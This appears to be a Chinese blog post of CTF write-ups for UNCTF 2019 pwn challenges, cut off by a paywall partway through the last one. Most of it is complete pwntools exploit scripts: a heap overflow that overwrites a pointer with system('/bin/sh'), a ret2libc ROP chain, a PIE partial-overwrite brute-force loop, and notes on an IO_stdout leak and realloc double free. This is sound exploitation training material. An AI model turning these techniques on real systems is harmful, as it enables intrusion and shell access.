unctf2019 pwn部分题解

最新推荐文章于 2022-03-06 13:51:37 发布
最新推荐文章于 2022-03-06 13:51:37 发布
阅读量1.5k 收藏 3
点赞数 1
分类专栏: pwn Linux 文章标签: pwn unctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010334666/article/details/103889663
版权
unctf2019 pwn部分题解新博客链接babyheapeasy,不讲了#!/usr/bin/env python2# -*- coding: utf-8 -*-from pwn import *local = 1host = '127.0.0.1' port = 10000context.log_level = 'debug'exe = '/tmp/tmp.spk5n...
摘要由CSDN通过智能技术生成

unctf2019 pwn部分题解

新博客链接

babyheap

easy,不讲了

#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from pwn import *

local = 1
host = '127.0.0.1' 
port = 10000
context.log_level = 'debug'
exe = '/tmp/tmp.spk5nTEvta/1910245db1406d3eedd'
context.binary = exe
elf = ELF(exe)
libc = elf.libc


#don't forget to change it
if local:
    io = process(exe)
else:
    io = remote(host,port)

s    = lambda data            : io.send(str(data))
sa   = lambda delim,data      : io.sendafter(str(delim), str(data))
sl   = lambda data            : io.sendline(str(data))
sla  = lambda delim,data      : io.sendlineafter(str(delim), str(data))
r    = lambda numb=4096       : io.recv(numb)
ru   = lambda delim,drop=True : io.recvuntil(delim, drop)

uu32 = lambda data            : u32(data.ljust(4, '\x00'))
uu64 = lambda data            : u64(data.ljust(8, '\x00'))
lg   = lambda name,data       : io.success(name + ": 0x%x" % data)

# break on aim addr
def debug(addr,PIE=True):
    if PIE:
        text_base = int(os.popen("pmap {}| awk '{
   {print $1}}'".format(io.pid)).readlines()[1], 16)
        gdb.attach(io,'b *{}'.format(hex(text_base+addr)))
    else:
        gdb.attach(io,"b *{}".format(hex(addr)))


#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================

# Arch:     amd64-64-little
# RELRO:    Full RELRO
# Stack:    Canary found
# NX:       NX enabled
# PIE:      No PIE (0x400000)

def c(idx):
    sla("Your choice: ", str(idx))

def new(content):
    c(1)
    sa("Plz input content: ", content)

def edit(idx, size, content):
    c(2)
    sla("Plz input index: ", str(idx))
    sla("Plz input size: ", str(size))
    sa("Plz input content: ", content)

def show(idx):
    c(3)
    sla("Plz input index: ", str(idx))

def free(idx):
    c(4)
    sla("Plz input index: ", str(idx))


def exp():
    new("a"*0x10)
    edit(0, 0x18, "a"*0x18)
    show(0)
    r(0x18)
    puts = uu64(r(6))
    lg("addr", puts)
    libc.address = puts - libc.symbols['puts']
    new("a"*0x10)
    payload = "/bin/sh;#\x00"
    payload = payload.ljust(0x18, "a")
    payload += p64(libc.symbols['system'])
    edit(1, 0x20, payload)
    show(1)



    #free(0)

if __name__ == '__main__':
    exp()
    io.interactive()

babyrop

简单

#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from pwn import *

local = 1
host = '192.25.1.3' 
port = 9999
context.log_level = 'debug'
exe = './1910245db1406dc99ea'
context.binary = exe
elf = ELF(exe)
libc = ELF('./libc6_2.23-0ubuntu3_i386.so')
libc = elf.libc


#don't forget to change it
if local:
    io = process(exe)
else:
    io = remote(host,port)

s    = lambda data            : io.send(str(data))
sa   = lambda delim,data      : io.sendafter(str(delim), str(data))
sl   = lambda data            : io.sendline(str(data))
sla  = lambda delim,data      : io.sendlineafter(str(delim), str(data))
r    = lambda numb=4096       : io.recv(numb)
ru   = lambda delim,drop=True : io.recvuntil(delim, drop)

uu32 = lambda data            : u32(data.ljust(4, '\x00'))
uu64 = lambda data            : u64(data.ljust(8, '\x00'))
lg   = lambda name,data       : io.success(name + ": 0x%x" % data)

# break on aim addr
def debug(addr,PIE=True):
    if PIE:
        text_base = int(os.popen("pmap {}| awk '{
   {print $1}}'".format(io.pid)).readlines()[1], 16)
        gdb.attach(io,'b *{}'.format(hex(text_base+addr)))
    else:
        gdb.attach(io,"b *{}".format(hex(addr)))


#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================

# Arch:     i386-32-little
# RELRO:    Full RELRO
# Stack:    No canary found
# NX:       NX enabled
# PIE:      No PIE (0x8048000)

def exp():
    payload = flat([
        "a"*0x20,
        p32(0x66666666)
    ])
    sl(payload)
    payload = flat([
        "a"*0x14,
        elf.plt['puts'],
        p32(0x804853d),
        elf.got['__libc_start_main']
    ])
    ru("What is your name?")
    r(1)
    sl(payload)
    __libc_start_main = uu32(r(4))
    lg("__libc_start_main", __libc_start_main)
    libc.address = __libc_start_main - libc.symbols['__libc_start_main']
    lg("libc_addr", libc.address)
    lg("system", libc.symbols['system'])
    lg("bin_sh", libc.search("/bin/sh").next())
    payload = flat([
        "a"*0x14,
        elf.plt["puts"],
        libc.symbols['system'],
        elf.got['__libc_start_main'],
        libc.search("/bin/sh").next()
    ])
    sla("What is your name?\n", payload)
    
    


if __name__ == '__main__':
    exp()
    io.interactive()

soeasypwn

#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from pwn import *
local = True

# Set up pwntools for the correct architecture
exe = "./" + 'pwn'
elf = context.binary = ELF(exe)

host = '101.71.29.5'
port = 10000


#don't forget to change it
context.log_level = 'debug'
libc = elf.libc
if local:
    io = process(exe)
else:
    io = remote(host,port)

s    = lambda data            : io.send(str(data))
sa   = lambda delim,data      : io.sendafter(str(delim), str(data))
sl   = lambda data            : io.sendline(str(data))
sla  = lambda delim,data      : io.sendlineafter(str(delim), str(data))
r    = lambda numb=4096       : io.recv(numb, timeout=1)
ru   = lambda delim,drop=True : io.recvuntil(delim, drop)

uu32 = lambda data            : u32(data.ljust(4, '\x00'))
uu64 = lambda data            : u64(data.ljust(8, '\x00'))
lg   = lambda name,data       : io.success(name + ": 0x%x" % data)


def debug(addr,PIE=True):
    if PIE:
        text_base = int(os.popen("pmap {}| awk '{
   {print $1}}'".format(io.pid)).readlines()[1], 16)
        gdb.attach(io,'b *{}'.format(hex(text_base+addr)))
    else:
        gdb.attach(io,"b *{}".format(hex(addr)))
#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================

# Arch:     i386-32-little
# RELRO:    Partial RELRO
# Stack:    Canary found
# NX:       NX enabled
# PIE:      PIE enabled
def exp():
    ru("Welcome our the ")
    leak = int(r(5),10)
    lg("leak", leak)
    #debug(0x902)
    addr = hex(leak) + "19CD"
    addr = int(addr, 16)
    lg("addr", addr)
    #gdb.attach(io)
    payload = 'a'*0xc + p32(addr) + '\x00'
    sa("So, Can you tell me your name?", payload)
    payload = '\x00'
    sa("(1.hello|2.byebye):", payload)
    r()
    r()

if __name__ == '__main__':
    while True:
        try:
            exp()
            io.interactive()
            break
        except Exception as e:
            io.close()
            io = process(exe)

这里有个小细节,r()两次,

Box

漏洞点

数组index是可以输入负数的,就是不会利用,后面看了萝卜师傅的wp才知道可以直接改IO_stdout

我是傻逼!这都想不到

然后有个double free,新点记录下

  • size == 0 ,这个时候等同于free
  • realloc_ptr == 0 && size > 0 , 这个时候等同于malloc
  • malloc_usable_size(realloc_ptr) >= size, 这个时候等同于edit
  • malloc_usable_size(realloc_ptr) < szie, 这个时候才是malloc一块更大的内存,将原来的内容复制过去,再将原来的chunk给free掉

所以利用这个点第一次可以用普通的

  1. free(ptr)
  2. realloc(ptr,0)

这就是double free

漏洞利用

  1. 利用IO_stdout泄露libc地址
  2. 利用double free改realloc为one_gadget
准备工作

def c(idx):
    sla("Your Choice: ", str(idx))

def new(idx, size):
    c(1)
    sla("Box ID: ", str(idx))
    sla(
最低0.47元/天 解锁文章
NoOneGroup
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2019.11.6 unctfpwn题——简单绕过pie
DSR446的博客
11-06 2786
这篇安全客关于pie和bapass绕过写的蛮好的! 看到函数最后返回到v1(),而且上一个函数的开辟的空间比后一个函数开辟的函数大,我们想到可以在前一个函数中提早将后门函数布置好,因为弹栈并不会是栈中的数据变化,除非往栈中写数据。 我们现在就通过gdb我们需要往栈的拿个位置写后门函数。 我们可以看见第一个数组的位置和后面 的v2()之间隔了0xc个字节。还有需要注意的是程序是将一个函数...
AVPro Movie Capture录屏(旧版本)
qq_36869197的博客
09-25 2054
首先它应该是老版本了,功能基本是GUI实现的,要改成UGUI需要自己去摘自己要的方法 一、插件使用方法:要想实现录制屏幕,基本上就是在摄像机上操作就可以了,需要添加几个脚本,在插件里面CameraCaptureDemo场景里已经挂好了,      每个脚本都有他自己的功能,这得自己去研究了... 二、录屏遇到的问题 1、卡,在录屏幕过程中会时不时的卡顿,有时候卡的程序会跑不动
Android Q 之MTK代码分析(四)--Camera Hal3 configure_Streams
转载和创作优秀的博客
03-06 1273
如果您觉得有用,请在文末支持一下,您的支持是对我最大的鼓励 《Android Q 之MTK代码分析(一)--Camera Hal3 Service》《Android Q 之MTK代码分析(二)--Camera Hal3 Search Sensor》《Android Q 之MTK代码分析(三)--Camera Hal3 Open/Close》《Android Q 之MTK代码分析(四)--Camera Hal3 configure_Streams》《Android Q 之MTK代码分析(五)--Camera
Ichunqiu_Easypwn
钞sir的博客
01-28 4021
轮回池前彼岸花 三生石旁那道疤 擦不去的眼中莎 泪眼迷离失去她 https://cc-sir.github.io/2019/01/28/ichunqiu_easypwn/ 方法 这道题是i春秋CTF的一道题,也是“百度杯”CTF比赛 十二月场中的一道pwn,这道题比较简单 我们先看看这道题的保护机制: sir@sir-PC:~/desktop$ checksec easypwn [*] '/ho...
在XML里的XSD和DTD以及standalone的使用3----具体使用详解
weixin_33946020的博客
06-22 99
本人亲自写的一个简单的测试例子 1、xsd定义 &lt;?xml version="1.0" encoding="utf-8"?&gt;&lt;xs:schema id="LONGTWNG" targetNamespace="http://tempuri.org/LONGTWNG.xsd" elementFormDefault="qualified" xmlns=
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
2019信息安全国赛部分题目文件
04-22
标题 "2019信息安全国赛部分题目文件" 涉及的是2019年全国大学生信息安全竞赛的一部分挑战,这些挑战通常涵盖多种信息安全技术领域,包括但不限于逆向工程、pwn(缓冲区溢出)以及可能的图像处理。描述中的 "easyGo,...
PWN.rar_PWN
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
2024NKCTF-pwn
最新发布
03-25
2024NKCTF_pwn
pwn入门题目汇总.rar
09-01
"pwn"是网络安全领域中的一个术语,全称是"pwnable",通常用于描述与缓冲区溢出、代码注入等技术相关的挑战或比赛。这类问题涉及到计算机系统的内存管理和安全漏洞利用,是逆向工程和信息安全研究的重要部分。本...
2019UNCTF-竞技赛 部分WP
A_dmin的博客
10-30 3112
UNCTF-竞技赛 部分WP
攻防世界PWNEasyPwn题解
seaaseesa的博客
11-15 3685
EasyPwn 首先,看一下程序的保护机制 开启了CANARY、NX和PIE,RELRO部分开启,我们可以改写GOT表 然后,我们用IDA分析 read的maxsize参数比变量的空间大小要小,因此无法溢出到栈底,加上开启了PIE,因此排除了ROP的方法 我们再仔细观察一下,发现snprintf在执行的过程中,v2可以溢出到v3,而v3存储的是格式化字符串,因此,我们可以溢出v2...
[BUUCTF]PWN——[ZJCTF 2019]EasyHeap
mcmuyanga的博客
12-16 463
[ZJCTF 2019]EasyHeap 附件 步骤: 例行检查,64位程序 试运行一下看看程序大概执行的情况,经典的堆块的菜单 64位ida载入,首先检索字符串,发现了读出flag的函数 看一下每个选项的函数 add 这边size的大小由我们输入控制,heaparray数组在bss段上存放着我们chunk的指针 edit,简单的根据指针修改对应chunk里的值,但是这里的size也是由我们手动输入的,也就是说只要我们这边输入的size比add的时候输入的size大就会造成溢出 delete,释
Libc堆管理机制及漏洞利用技术(一)
weixin_44304686的博客
06-13 503
原文链接:https://www.freebuf.com/articles/system/91527.html 原创作者:ysyy 前段时间参加了个名为RCTF的比赛,没进入决赛。正所谓知耻而后勇,作为一个Windows下的病毒分析人员,毅然决定拿Linux下libc的堆管理机制来出出气。总体感觉libc的堆管理还是有很多问题,安全上的考虑远没有Windows多。研究的过程参考了一些资料,也原创了...
第十届极客大挑战pwn
doudoudedi
11-12 735
Find tools 直接nc上去使用pwntool就可以看到base64字符串解密当作密码提即可 from pwn import * import base64 p=remote('pwnto.fun',9999) p.recvuntil('The key is :\n') psd=p.recv(24) psd=base64.b64decode(psd) log.success('pas: '+...
高级ROP
听鬼哥说故事
08-29 4911
高级ROP其实和一般的ROP基本一样,其主要的区别在于它利用了一些比较有意思的gadgets。
BUUCTF-PWN刷题记录-5(Tcache)
weixin_44145820的博客
04-13 1324
目录ciscn_2019_final_3[V&N2020 公开赛]easyTHeap ciscn_2019_final_3 只有添加和删除两个功能 限制了申请的大小,最大为0x78,意味着chunk最大为0x80,添加完可以泄露堆上的地址 free之后没有置空,可以double free 题目分析差不多就这样,下面是漏洞利用: 先申请一个大小为0x78的heap[0],记录下返回地...
BUUCTF刷题3
m0_51251108的博客
05-26 2744
题目:pwnable_start:wustctf2020_closed:hitcontraining_heapcreator:0ctf_2017_babyheap:ciscn_2019_es_7:jarvisoj_level5:hitcontraining_bamboobox: pwnable_start: 关键词: 汇编,泄露ebp,调试 思路: 1.查看汇编代码得知题目信息,发现read处可0x14后可溢出 2.依靠其中的write,是根据esp来确定打印addr,选择覆盖ret地址为write那里,便
pwn学习总结
Ree的整理与收集
09-01 5746
遇到的优秀文章 关于Heap Overflow(堆溢出) Linux常见漏洞利用技术实践 GCC 中的编译器堆栈保护技术 Linux环境进程间通信(一) 现代Linux操作系统的栈溢出(一) 解读Linux安全机制之栈溢出保护工具与常用命令*nix命令 export ...="..." 添加一个环境变量,这个环境变量只在这个shell进程中起作用 gdbgdb的话一定会装peda插件。p
UNCTF2021WP.pdf
12-10
"UNCTF2021WP.pdf 包含了多个网络安全竞赛的解题攻略,涉及Web、Pwn等领域。" 在这个PDF文档中,详细介绍了UNCTF2021网络安全竞赛中的若干挑战及其解决方案。以下是根据提供的部分内容对各个知识点的详细说明: **...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值